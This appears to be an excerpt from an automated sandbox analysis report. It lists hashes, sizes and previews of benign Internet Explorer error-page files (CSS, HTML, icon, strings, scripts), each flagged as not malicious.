                            Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\NewErrorPageTemplate[3]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1612
                            Entropy (8bit):4.869554560514657
                            Encrypted:false
                            SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                            MD5:DFEABDE84792228093A5A270352395B6
                            SHA1:E41258C9576721025926326F76063C2305586F76
                            SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                            SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                            Malicious:false
                            Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\dnserror[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):2997
                            Entropy (8bit):4.4885437940628465
                            Encrypted:false
                            SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                            MD5:2DC61EB461DA1436F5D22BCE51425660
                            SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                            SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                            SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                            Malicious:false
                            Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\dnserror[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):2997
                            Entropy (8bit):4.4885437940628465
                            Encrypted:false
                            SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                            MD5:2DC61EB461DA1436F5D22BCE51425660
                            SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                            SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                            SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                            Malicious:false
                            Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\dnserror[3]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):2997
                            Entropy (8bit):4.4885437940628465
                            Encrypted:false
                            SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                            MD5:2DC61EB461DA1436F5D22BCE51425660
                            SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                            SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                            SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                            Malicious:false
                            Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\dnserror[4]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):2997
                            Entropy (8bit):4.4885437940628465
                            Encrypted:false
                            SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                            MD5:2DC61EB461DA1436F5D22BCE51425660
                            SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                            SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                            SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                            Malicious:false
                            Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\down[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                            Category:dropped
                            Size (bytes):748
                            Entropy (8bit):7.249606135668305
                            Encrypted:false
                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                            MD5:C4F558C4C8B56858F15C09037CD6625A
                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                            Malicious:false
                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\down[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                            Category:dropped
                            Size (bytes):748
                            Entropy (8bit):7.249606135668305
                            Encrypted:false
                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                            MD5:C4F558C4C8B56858F15C09037CD6625A
                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                            Malicious:false
                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\down[3]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                            Category:dropped
                            Size (bytes):748
                            Entropy (8bit):7.249606135668305
                            Encrypted:false
                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                            MD5:C4F558C4C8B56858F15C09037CD6625A
                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                            Malicious:false
                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\down[4]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                            Category:dropped
                            Size (bytes):748
                            Entropy (8bit):7.249606135668305
                            Encrypted:false
                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                            MD5:C4F558C4C8B56858F15C09037CD6625A
                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                            Malicious:false
                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\down[5]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                            Category:dropped
                            Size (bytes):748
                            Entropy (8bit):7.249606135668305
                            Encrypted:false
                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                            MD5:C4F558C4C8B56858F15C09037CD6625A
                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                            Malicious:false
                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\down[6]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                            Category:dropped
                            Size (bytes):748
                            Entropy (8bit):7.249606135668305
                            Encrypted:false
                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                            MD5:C4F558C4C8B56858F15C09037CD6625A
                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                            Malicious:false
                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\errorPageStrings[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4720
                            Entropy (8bit):5.164796203267696
                            Encrypted:false
                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                            Malicious:false
                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\errorPageStrings[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4720
                            Entropy (8bit):5.164796203267696
                            Encrypted:false
                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                            Malicious:false
                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\errorPageStrings[3]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4720
                            Entropy (8bit):5.164796203267696
                            Encrypted:false
                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                            Malicious:false
                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\errorPageStrings[4]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4720
                            Entropy (8bit):5.164796203267696
                            Encrypted:false
                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                            Malicious:false
                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\httpErrorPagesScripts[1]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):12105
                            Entropy (8bit):5.451485481468043
                            Encrypted:false
                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                            MD5:9234071287E637F85D721463C488704C
                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                            Malicious:false
                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\httpErrorPagesScripts[2]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):12105
                            Entropy (8bit):5.451485481468043
                            Encrypted:false
                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                            MD5:9234071287E637F85D721463C488704C
                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                            Malicious:false
